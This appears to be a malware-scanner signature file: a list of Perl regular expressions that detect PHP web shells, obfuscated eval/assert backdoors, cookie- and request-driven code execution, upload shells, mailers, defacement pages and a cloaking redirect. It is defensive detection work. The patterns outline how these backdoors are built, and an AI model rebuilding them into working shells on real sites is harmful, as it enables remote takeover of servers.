qr/<\?php\s+if\s+\(isset\(\$\_POST\[\'upload\'\]\)\)\{.+?fwrite\(\$fp\,\s+\$\_POST\[\'uploadfile\'\]\)\;.+?else\s+\{header\(\'Location\:\s+\.\.\/\.\.\/\'\)\;\}\s+\?>/is,
qr/<\?php\s+if\s+\(\(isset\(\$\_POST\[\'to\'\]\)\)\s+AND.+?\$\_POST\[\'headers\'\]\)\)\s+\{echo\s+\'ok\'\;\}.+?else\s+\{\s+header\(\'Location\:\s+\/\'\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$\w\d\=\$\_REQUEST\[\'sort\'\]\;\$\w\d\=\'\'\;\$\w\d\=\".+?\"\;\$\w\d\=array\(.+?\)\;foreach\(\$\w\d\s+as\s+\$\w\d\)\{\$\w\d\.\=\$\w\d\[\$\w\d\]\;\}\$\w\d\=strrev\(\"noi\"\.\"tcnuf\"\.\"\_eta\"\.\"erc\"\)\;\$\w\d\=\$\w\d\(\"\"\,\$\w\d\(\$\w\d\)\)\;\$\w\d\(\)\;\?>/is,
qr/<\?php\s+eval\(\"\?>\"\s+\.\s+base64\_decode\(\".+?\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\=Array\(\)\;global\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\$GLOBALS\;\$\{.+?\{eval\/\*([A-z0-9]{1,20})\*\/\(\$([A-z0-9]{1,20})\[\d\]\(\$([A-z0-9]{1,20})\[\d\]\)\)\;exit\(\)\;\}\}\}\s+\?>/is,
qr/<\?php\s+header\(\"Cache\-Control\:\s+tect\"\)\;\s+\@error\_reporting\(0\)\;\s+\@ini\_set\(\"display\_errors\"\,0\)\;\s+\@ini\_set\(\"log\_errors\"\,0\)\;\s+\@ini\_set\(\"error\_log\"\,0\)\;\s+if\s+\(isset\(\$\_POST\[\"x\"\]\)\)\s+\{\s+eval\(\$\_POST\[\"x\"\]\)\;\s+\}\s+\?>/is,
qr/<\?php.+?\$data\s+\=\s+file\_get\_contents\(\'php:\/\/input\'\)\;.+?\$data\s+\=\s+base64\_decode\(\$data\)\;.+?if\s+\(\$ok\)\s+\{\s+d\(\'ok\'\)\;\s+\}\s+else\s+\{\s+d\(\'bad\:\'\.\$fname\.\'\|\'\.\_\_DIR\_\_\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'b\'\.\'a\'\.\'s\'\.\'e64\_deco\'\.\'de\'\;\s+\@eval\(\$([A-z0-9]{1,20})\(.+?\)\)\;/is,
qr/<\?php\s+\$alphabet\s+\=\s+\"\..+?\$string\s+\=\s+\".+?\$array\_name\s+\=\s+\"\"\;\s+\$ar\s+\=\s+array\(.+?foreach\(\$ar\s+as\s+\$t\)\{\s+\$array\_name\s+\.\=\s+\$alphabet\[\$t\]\;\s+\}\s+\$a\s+\=\s+strrev\(\"noi\"\.\"tcnuf\"\.\"\_eta\"\.\"erc\"\)\;\s+\$f\s+\=\s+\$a\(\"\"\,\s+\$array\_name\(\$string\)\)\;\s+\$f\(\)\;/is,
qr/<\?php\s+if\(isset\(\$\_POST\[\"mailto\"\]\)\)\s+\$MailTo\s+\=\s+base64\_decode\(\$\_POST\[\"mailto\"\]\)\;\s+else.+?echo\s+\"sent\_ok\"\;\s+else\s+echo\s+\"sent\_error\"\;\s+\?>/is,
qr/<script\s+type\=\"text\/javascript\">eval\(function\(p\,a\,c\,k\,e\,r\).+?script\|\|\|\|document\|defer\|google\_analytics\|yandexMetrix.+?start\|http\|window\|11\'\.split\(\'\|\'\)\,0\,\{\}\)\)<\/script>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+Array\(\)\;global\s+\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+\$GLOBALS\;\$\{.+?\]\)\{eval\/\*([A-z0-9]{1,20})\*\/\(\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\[([A-z0-9]{1,20})\]\]\)\;\}exit\(\)\;\}\s+\?>/is,
qr/<\?php\s+echo\s+([0-9]{1,20})\+([0-9]{1,20})\;\$([A-z0-9]{1,20})\_([A-z0-9]{1,20})\=base64\_decode\(.+?if\(\$\_POST\[base64\_decode\(.+?\)\)\]\[base64\_decode\(.+?\)\.\"\=\"\)\]\)\;\}\;\s+\?>/is,
qr/<html\s+oncontextmenu\=.+?CYBER\_LoW.+?width\=\"1\">\s+<\/html>/is,
qr/<html>\s+<head>.+?SemsexTheBg78.+?frameborder\=\"0\"\s+allowfullscreen>/is,
qr/<\!doctype\s+html>\s+<html>\s+<title>Vespa<\/title>.+?Hacked\s+By\s+Trihash.+?<\/html>/is,
qr/\"><input\s+type\=submit.+?\!function\_exists\(\"posix\_getpwuid\"\).+?<\/marquee><\/div>/is,
qr/<\?php\s+\$db\_\_g\_\=\'base\'\.\(128\/2\)\.\'\_de\'\.\'code\'\;\$db\_\_g\_\=\$db\_\_g\_\(str\_replace\(.+?submit\"value\=\"\&gt\;\"\/><\/form>/is,
qr/<\?php\s+\$\{\"\\x.+?\]\=\"key\"\;\@ini\_set\(.+?\]\}\=\@unserialize\(decode\(get\_params\(\$\{\$\{\"GLO.+?\]\}\;\}\s+\?>/is,
qr/<\?php\s+eval\(gzinflate\(base64\_decode\(.+?\'\)\)\)\;\s+\?>/is,
qr/<\?php\s+eval\(\"\?>\"\.base64\_decode\(\".+?\"\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\;\$([A-z0-9]{1,20})\s+\=\s+Array\(\)\;\$([A-z0-9]{1,20})\[\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\]\.\$([A-z0-9]{1,20})\[\d\d\]\;\$([A-z0-9]{1,20})\[\].+?\;foreach\s+\(\$([A-z0-9]{1,20})\[\d\]\(\$\_COOKIE\,\s+\$\_POST\)\s+as\s+\$([A-z0-9]{1,20}).+?\$([A-z0-9]{1,20})\[\d\]\(\$([A-z0-9]{1,20})\)\)\)\)\;\}/is,
qr/<html><head>.+?\@HACKED\s+By\_BDJ\-007.+?var\s+pesen\=\"BDJ\-007\s+Was\s+Here\s+>\_\*\"\;.+?<\/script>\s+<style>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\=Array\(\)\;global\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\$GLOBALS\;\$\{.+?\)\{eval\/\*([A-z0-9]{1,20})\*\/\(\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\[([A-z0-9]{1,20})\]\]\)\;\}exit\(\)\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\{\$([A-z0-9]{1,20})\s+\=\s+\'\'\;\s+for\(\$i\=0\;\s+\$i\s+<\s+strlen\(\$([A-z0-9]{1,20})\)\;\s+\$i\+\+\)\{\$([A-z0-9]{1,20})\s+\.\=\s+isset\(\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\[\$i\]\]\).+?eval\/\*([A-z0-9]{1,20})\*\/\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/include\s+\"\\x.+?eval\(base64\_decode\(.+?file\_get\_contents\(\"index\.htm\"\)\;exit\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'.+?\;\$([A-z0-9]{1,20})\s+\=\s+Array\(\)\;\$([A-z0-9]{1,20})\[\]\s+\=.+?\]\;foreach\s+\(\$([A-z0-9]{1,20})\[\d\]\(\$\_COOKIE\,\s+\$\_POST\).+?\)\{function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\{return\s+\$([A-z0-9]{1,20}).+?\{eval\(\$([A-z0-9]{1,20})\[.+?\]\(\$([A-z0-9]{1,20})\)\)\)\)\;\}/is,
qr/<\?php\s+session\_start\(\)\;.+?\#\s+md5\:\s+IndoXploit.+facebookexternalhit.+?\Z/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+Array\(\)\;global\s+\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+\$GLOBALS\;\$\{.+?\]\)\{eval\/\*([A-z0-9]{1,20})\*\/\(\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\[([A-z0-9]{1,20})\]\]\)\;\}exit\(\)\;\}\s+\?>/is,
qr/<\!DOCTYPE\s+html>.+?<title>PHP\s+sCAn<\/title>.+?\?>\s+<\/html>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+function\s+([A-z0-9]{1,20})\s+\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\s+\{\s+return\s+\$([A-z0-9]{1,20})\s+\^\s+str\_repeat\s+\(\$([A-z0-9]{1,20})\,\s+ceil\s+\(strlen\s+\(\$([A-z0-9]{1,20})\)\s+\/\s+strlen\s+\(\$([A-z0-9]{1,20})\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{die\(pi\(\)\*\d\)\;\}\s+error\_reporting\(0\)\;\s+if\s+\(isset\(\$\_GET\[\"ping\"\]\)\s+and\s+\$\_GET\[\"ping\"\]\s+\=\=\s+\(\"ping\_host\"\)\)\s+\{.+?if\s+\(\$return\s+\=\=\s+true\)\s+\{\s+echo\s+\"true\"\;\s+\}\s+else\s+\{\s+echo\s+\"false\"\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[.+?\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[.+?\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/error\s+page\s+news\s+version\s+\d\.\d\.\d\s+<\?php.+?\$([A-z0-9]{1,20})\s+=\s+str\_replace\(.+?\/\/\$([A-z0-9]{1,20})\(\)\;\s+\?>/is,
qr/<\?php\s+\$\w\_\_\_\w\_\=\'base\'\.\(32\*2\)\.\'\_de\'\.\'code\'\;\$\w\_\_\_\w\_\=\$\w\_\_\_\w\_\(str\_replace\(\"\\n\"\,\s+\'\'.+?value\=\"\&gt\;\"\/><\/form>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"preg\_replac\"\.\"e\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/([A-z0-9]{1,20})\'\,\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\=Array\(\)\;global\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\$GLOBALS\;\$\{.+?\$([A-z0-9]{1,20})\)\;\}\}\s+\?>/is,
qr/<\!\-\-\s+this\_file\_is\_blocked\s+\-\-><\?php\s+error\_reporting\(0\)\;\s+if\s+\(isset\(\$\_GET\[\"ping\"\]\)\s+and\s+\$\_GET\[\"ping\"\]\s+\=\=\s+\(\"ping\_host\"\)\)\s+\{.+?\}\s+else\s+\{\s+echo\s+\"false\"\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'ba\'\.\'se64\'\.\'\_\'\.\'d\'\.\'eco\'\.\'d\'\.\'e\'\;\s+\@eval\(\$([A-z0-9]{1,20})\(.+?\.\'.+?\'\.\'.+?\'\)\)\;/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\=\"\"\).+?\)\)\)\;\s+\$([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+\/\/([A-z0-9]{150,}).+?eval\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\)\)\{if\(isset\(\$\_FILES\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=getcwd\(\)\.\'\/\'\;\$([A-z0-9]{1,20})\=\$\_FILES\[\'([A-z0-9]{1,20})\'\]\;\@move\_uploaded\_file\(\$([A-z0-9]{1,20})\[\'tmp\_name\'\]\,\s+\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\)\;echo\"Done\:\s+\"\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\;\}else\{\?><form\s+method\=\"POST\"\s+enctype\=\"multipart\/form\-data\"><input\s+type\=\"file\"\s+name\=\"([A-z0-9]{1,20})\"\/><input\s+type\=\"Submit\"\/><\/form><\?php\s+\}\}\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"assert\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"as\"\.\"se\"\.\"rt\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\"preg\_\"\.\"repla\"\.\"ce\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\"preg\_r\"\.\"eplace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"as\"\.\"se\"\.\"rt\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\$.+?\=str\_replace\(\'\s+\'\,\'\'\,\$.+?for\s+\(\s+\$i\s+\=\s+0\;\s+\$i\s+<\s+strlen\(\s+\$.+?\=\@gzinflate\(strrev\(\$.+?create\_function\(\'\$.+?\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?error\_reporting\(0\)\;.+?\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?\$domain\s+\=\s+\'n\.liveupdates\.host\'\;.+?\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?if\s+\(preg\_match\(\'\/googlebot\|slurp.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$([A-z0-9]{1,10})\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"preg\_re\"\.\"place\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*vsql\*\/exit\;\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"pre\"\.\"g\_r\"\.\"epl\"\.\"ace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_repl\"\.\"ace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\"preg\"\.\"\_rep\"\.\"lace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
